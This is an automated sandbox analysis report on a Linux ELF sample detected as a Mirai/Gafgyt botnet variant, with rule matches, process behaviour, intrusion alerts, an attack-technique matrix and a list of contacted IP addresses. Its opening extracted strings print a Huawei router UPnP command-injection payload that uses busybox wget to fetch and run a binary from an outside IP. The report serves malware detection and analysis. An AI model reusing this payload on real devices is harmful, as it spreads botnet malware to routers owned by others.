            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.146 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: wgetcurlbusyboxechocatnano/proc/proc/%d/cmdlinerabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbin/poweroff/usr/bin/poweroff/usr/sbin/halt/usr/bin/halt3f
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: pBVFNv9jh6.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: pBVFNv9jh6.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@21/0
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/238/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/239/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/3753/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/914/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/5273/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/3095/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/241/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1906/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/802/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1482/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1480/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/371/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1238/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/134/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/3413/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/1475/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/936/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/pBVFNv9jh6.elf (PID: 5427)File opened: /proc/816/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 52968 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52968
            Source: unknownNetwork traffic detected: HTTP traffic on port 43962 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 37215
            Source: /tmp/pBVFNv9jh6.elf (PID: 5421)Queries kernel information via 'uname': Jump to behavior
            Source: pBVFNv9jh6.elf, 5421.1.00007ffd9f76b000.00007ffd9f78c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
            Source: pBVFNv9jh6.elf, 5421.1.0000562d6f44e000.0000562d6f4b1000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
            Source: pBVFNv9jh6.elf, 5421.1.00007ffd9f76b000.00007ffd9f78c000.rw-.sdmpBinary or memory string: 0x86_64/usr/bin/qemu-sh4/tmp/pBVFNv9jh6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/pBVFNv9jh6.elf
            Source: pBVFNv9jh6.elf, 5421.1.0000562d6f44e000.0000562d6f4b1000.rw-.sdmpBinary or memory string: Eo-V5!/etc/qemu-binfmt/sh4

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: pBVFNv9jh6.elf, type: SAMPLE
            Source: Yara matchFile source: 5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pBVFNv9jh6.elf PID: 5421, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: Yara matchFile source: pBVFNv9jh6.elf, type: SAMPLE
            Source: Yara matchFile source: 5421.1.00007f4ec8400000.00007f4ec841c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pBVFNv9jh6.elf PID: 5421, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Scripting
            Path InterceptionPath Interception1
            Scripting
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
            Non-Application Layer Protocol
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication5
            Application Layer Protocol
            Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer3
            Ingress Tool Transfer
            Data Encrypted for ImpactServerGather Victim Network Information
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1377640 Sample: pBVFNv9jh6.elf Startdate: 19/01/2024 Architecture: LINUX Score: 100 30 147.46.224.158 SNU-AS-KRSeoulNationalUniversityKR Korea Republic of 2->30 32 haha.skyljne.click 2->32 34 99 other IPs or domains 2->34 36 Snort IDS alert for network traffic 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 5 other signatures 2->42 8 pBVFNv9jh6.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 gdm3 Default 2->12         started        14 2 other processes 2->14 signatures3 process4 process5 16 pBVFNv9jh6.elf 8->16         started        18 gsd-print-notifications 10->18         started        process6 20 pBVFNv9jh6.elf 16->20         started        22 pBVFNv9jh6.elf 16->22         started        24 pBVFNv9jh6.elf 16->24         started        28 2 other processes 16->28 26 gsd-print-notifications gsd-printer 18->26         started       
            SourceDetectionScannerLabelLink
            pBVFNv9jh6.elf58%ReversingLabsLinux.Trojan.Mirai
            pBVFNv9jh6.elf100%AviraEXP/ELF.Mirai.Gen.Z.A
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://103.245.236.146/huhu.mpsl;0%Avira URL Cloudsafe
            http://103.245.236.146/huhu.mips;$0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            haha.skyljne.click
            103.245.236.146
            truetrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://103.245.236.146/huhu.mpsl;pBVFNv9jh6.elffalse
              • Avira URL Cloud: safe
              unknown
              http://103.245.236.146/huhu.mips;$pBVFNv9jh6.elffalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/pBVFNv9jh6.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/pBVFNv9jh6.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  41.116.238.233
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  86.99.44.150
                  unknownUnited Arab Emirates
                  5384EMIRATES-INTERNETEmiratesInternetAEfalse
                  157.114.204.189
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  197.76.213.107
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  49.16.142.95
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  47.104.234.244
                  unknownChina
                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                  72.124.179.162
                  unknownUnited States
                  22394CELLCOUSfalse
                  41.62.154.184
                  unknownunknown
                  37705TOPNETTNfalse
                  32.190.59.238
                  unknownUnited States
                  20057ATT-MOBILITY-LLC-AS20057USfalse
                  94.84.154.172
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  114.177.70.74
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  76.207.47.231
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  197.22.223.235
                  unknownTunisia
                  37693TUNISIANATNfalse
                  160.20.71.190
                  unknownBrazil
                  266146I9TelecomBRfalse
                  164.110.2.41
                  unknownUnited States
                  14827WSDOT-ASNUSfalse
                  152.177.3.192
                  unknownUnited States
                  701UUNETUSfalse
                  195.182.226.171
                  unknownItaly
                  39399FENIXVT-ASRUfalse
                  205.49.114.171
                  unknownUnited States
                  2914NTT-COMMUNICATIONS-2914USfalse
                  104.201.101.33
                  unknownUnited States
                  30036MEDIACOM-ENTERPRISE-BUSINESSUSfalse
                  155.170.172.213
                  unknownUnited States
                  20057ATT-MOBILITY-LLC-AS20057USfalse
                  165.57.121.163
                  unknownZambia
                  37154ZAMTELZMfalse
                  180.231.15.205
                  unknownKorea Republic of
                  17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                  205.211.68.211
                  unknownCanada
                  812ROGERS-COMMUNICATIONSCAfalse
                  158.61.155.168
                  unknownUnited States
                  46196RCIT-CORNETUSfalse
                  12.207.216.248
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  157.31.108.171
                  unknownUnited States
                  8968BT-ITALIAITfalse
                  204.16.39.171
                  unknownUnited States
                  11492CABLEONEUSfalse
                  39.244.206.157
                  unknownIndonesia
                  23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                  146.35.247.188
                  unknownUnited States
                  197938TRAVIANGAMESDEfalse
                  44.156.172.107
                  unknownUnited States
                  62383LDS-ASBEfalse
                  174.126.118.60
                  unknownUnited States
                  11492CABLEONEUSfalse
                  138.68.122.142
                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  41.172.168.206
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  212.217.144.228
                  unknownSweden
                  12501NORRNODITSSEfalse
                  131.41.161.179
                  unknownUnited States
                  385AFCONC-BLOCK1-ASUSfalse
                  17.10.67.174
                  unknownUnited States
                  714APPLE-ENGINEERINGUSfalse
                  157.33.247.164
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  172.188.250.115
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  109.245.203.138
                  unknownSerbia
                  15958TELENOR_DOO_ASTelenordoo-NETRSfalse
                  8.175.9.63
                  unknownSingapore
                  37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                  74.148.7.21
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  181.116.130.214
                  unknownArgentina
                  11664TechtelLMDSComunicacionesInteractivasSAARfalse
                  32.144.175.232
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  133.202.207.37
                  unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
                  39.3.14.229
                  unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  83.156.70.7
                  unknownFrance
                  12322PROXADFRfalse
                  75.76.29.8
                  unknownUnited States
                  12083WOW-INTERNETUSfalse
                  185.173.56.208
                  unknownJordan
                  59451ARABBANK-ASJOfalse
                  157.162.118.95
                  unknownGermany
                  22192SSHENETUSfalse
                  41.85.32.183
                  unknownSouth Africa
                  22355FROGFOOTZAfalse
                  41.202.62.195
                  unknownSouth Africa
                  25818CMCNETWORKSZAfalse
                  167.212.83.77
                  unknownUnited States
                  33166BFS-49-33166USfalse
                  67.215.85.150
                  unknownUnited States
                  36692OPENDNSUSfalse
                  57.107.164.64
                  unknownBelgium
                  51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                  197.199.166.218
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  136.113.213.219
                  unknownUnited States
                  15169GOOGLEUSfalse
                  197.252.28.249
                  unknownSudan
                  15706SudatelSDfalse
                  9.189.143.14
                  unknownUnited States
                  3356LEVEL3USfalse
                  44.87.105.241
                  unknownUnited States
                  7377UCSDUSfalse
                  76.80.96.220
                  unknownUnited States
                  20001TWC-20001-PACWESTUSfalse
                  142.184.187.108
                  unknownCanada
                  577BACOMCAfalse
                  54.97.145.27
                  unknownUnited States
                  16509AMAZON-02USfalse
                  154.25.231.55
                  unknownUnited States
                  174COGENT-174USfalse
                  193.79.200.213
                  unknownNetherlands
                  702UUNETUSfalse
                  41.125.243.173
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  217.96.200.43
                  unknownPoland
                  5617TPNETPLfalse
                  157.251.170.246
                  unknownUnited States
                  32934FACEBOOKUSfalse
                  147.46.224.158
                  unknownKorea Republic of
                  9488SNU-AS-KRSeoulNationalUniversityKRtrue
                  61.230.177.114
                  unknownTaiwan; Republic of China (ROC)
                  3462HINETDataCommunicationBusinessGroupTWfalse
                  221.144.67.130
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  14.136.29.141
                  unknownHong Kong
                  9269HKBN-AS-APHongKongBroadbandNetworkLtdHKfalse
                  96.75.82.109
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  217.60.218.158
                  unknownIran (ISLAMIC Republic Of)
                  31549RASANAIRfalse
                  37.200.201.204
                  unknownOman
                  50010NAWRAS-ASSultanateofOmanOMfalse
                  197.202.209.155
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.121.41.92
                  unknownUnited States
                  2514INFOSPHERENTTPCCommunicationsIncJPfalse
                  117.62.255.51
                  unknownChina
                  134756CHINANET-NANJING-IDCCHINANETNanjingIDCnetworkCNfalse
                  202.211.121.190
                  unknownJapan23817KOCHI-IDCFujitsuLimitedJPfalse
                  41.187.12.182
                  unknownEgypt
                  20928NOOR-ASEGfalse
                  41.217.104.36
                  unknownNigeria
                  37340SpectranetNGfalse
                  170.11.193.193
                  unknownUnited States
                  1621ASN-SECURIANUSfalse
                  115.107.38.30
                  unknownChina
                  17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                  51.242.185.10
                  unknownUnited Kingdom
                  2686ATGS-MMD-ASUSfalse
                  171.248.236.26
                  unknownViet Nam
                  7552VIETEL-AS-APViettelGroupVNfalse
                  141.213.85.92
                  unknownUnited States
                  36375UMICH-AS-5USfalse
                  19.31.162.238
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  53.214.18.18
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  156.179.81.158
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  155.204.68.123
                  unknownNetherlands
                  8698NationwideBuildingSocietyGBfalse
                  5.106.241.165
                  unknownIran (ISLAMIC Republic Of)
                  197207MCCI-ASIRfalse
                  41.203.40.24
                  unknownSouth Africa
                  36968ECN-AS1ZAfalse
                  101.82.178.142
                  unknownChina
                  4812CHINANET-SH-APChinaTelecomGroupCNfalse
                  153.69.222.236
                  unknownUnited States
                  13806NCRCORPUSfalse
                  87.178.59.11
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  146.112.148.209
                  unknownAustria
                  36692OPENDNSUSfalse
                  197.149.52.157
                  unknownMadagascar
                  37054Telecom-MalagasyMGfalse
                  197.70.138.254
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  110.8.116.147
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  166.192.16.162
                  unknownUnited States
                  20057ATT-MOBILITY-LLC-AS20057USfalse
                  69.139.43.241
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  41.116.238.233UCq8oVPbHN.elfGet hashmaliciousMiraiBrowse
